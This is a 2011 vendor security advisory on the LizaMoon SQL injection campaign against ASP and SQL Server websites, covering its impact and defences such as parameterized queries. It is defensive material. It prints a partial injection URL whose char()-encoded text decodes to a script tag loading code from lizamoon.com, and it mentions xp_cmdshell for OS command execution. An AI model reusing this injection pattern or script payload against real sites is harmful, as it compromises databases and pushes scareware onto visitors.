TeamSHATTER

Breach Advisory: LizaMoon SQL Injection Attack

In the past week, web security experts have been tracking a widespread SQL injection attack known as LizaMoon, named after the domain name of one of the various sites hosting a browser redirection payload.  Most notably, content on iTunes was found to contain the injection link.  

The LizaMoon attack infects web sites by injecting code that is updating text columns in the backend database, whose content is used to build the pages displayed by the web server. The attack redirects visitors to a rogue AV vendor website that tries to install “scareware.”  When redirected, visitors are presented with fake screens and prompted to purchase and download fake antivirus software. 

What does LizaMoon look like?

The LizaMoon SQL injection attack code appears to vary based on the website it’s attacking.  For example: 
news.aspx?id=281′+update+Tbl_Answers+set+AnswerText=REPLACE(cast(AnswerText+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bc……   Others are very similar.
The ASCII codes used in the char(..) statements translate to “</title><script src=http://lizamoon.com/ur.php></script>” or similar.

Which databases are affected?

So far, it appears that LizaMoon is focused on web applications developed in ASP and ASP.net. and has only affected installations of SQL Server. However, other database platforms and web development frameworks are just as vulnerable to this type of attack.  Recently, web sites belonging to Oracle’s Sun and MySQL subsidiaries were infected, exposing database names and email addresses. 

What is the impact?

As currently implemented: Continued research by web security experts and AppSec’s TeamSHATTER database vulnerability research team have found that the LizaMoon attack is largely ineffective.  Most of the domains where the attack is redirecting traffic are not functioning.  Also, the way that the attack inserts a JavaScript snippet to redirect site visitors is not very effective.  Most affected web pages analyzed by TeamSHATTER showed some raw html code with the redirect to the http://lizamoon.com/ur.php displayed in text boxes.  However, very few were actual clickable links.

Potential for Future Attacks: Despite the limited impact of LizaMoon SQL Injection Attack, we should not forget that:

1. The LizaMoon attack was of a large scale. The attack infected a million+ sites.
2. The concepts the attack employs are easily applicable to other more serious attacks.  More sophisticated, organized and well-funded criminals and state agencies are capable of inflicting devastating damages.
3. The attacks can reach the database layer where sensitive data resides. These same kinds of attacks could be used to attack the website and host, the host’s OS, and other computers on the same network.  They can be used to install Trojans, viruses, harvest data, etc. With some of these users, applications and computers having access to the databases, large scale credit card thefts and breaches of other highly sensitive data are possible.

How can I ensure that my organization is protected?

There is no specific workaround for the database component of this threat besides employing best practices. For existing Application Security customers, DbProtect’s capabilities will address steps 2, 3 and 4 from below.

LizaMoon is a case study in poor coding and database configuration practices.  When web applications are written correctly and their backend databases are managed against vulnerabilities, SQL injections are proactively prevented.  AppSec recommends that organizations take the following steps to protect their site visitors, web applications and database assets:

1. First and foremost, web applications should be reviewed to insure proper input validation on web forms and URL parameters.  Database queries to the backend database, especially SELECT, INSERT and UPDATE queries should never be created by simply concatenating a SQL query string with input from web form fields. The input should be sanitized and then parameterized queries should be used to interact with the database.
2. Harden your database. Unpatched database vulnerabilities can be exploited by SQL Injection attacks.  They can give an attacker elevated privileges and access to sensitive data. For example, unsecure configurations can allow an attacker to execute OS commands through xp_cmdshell, providing full access to database assets.  A program of database vulnerability assessment and rights management should be considered a high priority. 
3. Next, enforce proper separation of duties for the web app accounts used to connect to the backend database. Unauthenticated visitors should only have ‘read only’ access to the database backend, and only administrators or content managers should be given insert, or update privileges to the backend tables used to serve up pages. User rights management tools should be used to enforce minimal privileges.
4. Finally, monitor your database traffic. A properly configured database activity monitoring solution will help detect malicious SQL code and the fine grained audit trail created by a good database activity monitoring solution will also help greatly with forensic analysis needed to reconstruct events in the aftermath of an attack.

Each of these steps incorporated into a defense in depth strategy will protect your data assets and IT infrastructure from SQL injection attacks.

How can I learn more?

Application Security and TeamSHATTER are hosting a special webinar to help organizations address the LizaMoon SQL Injection threat this Thursday.

• Thursday, April 7, 2011
• 1pm ET
• Register: https://www1.gotomeeting.com/register/985189472

Links:
Visit Google and search for  “<script src=http://*/ur.php” to see a list of affected sites

Application Security, Inc.’s database security solutions have helped over 2000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.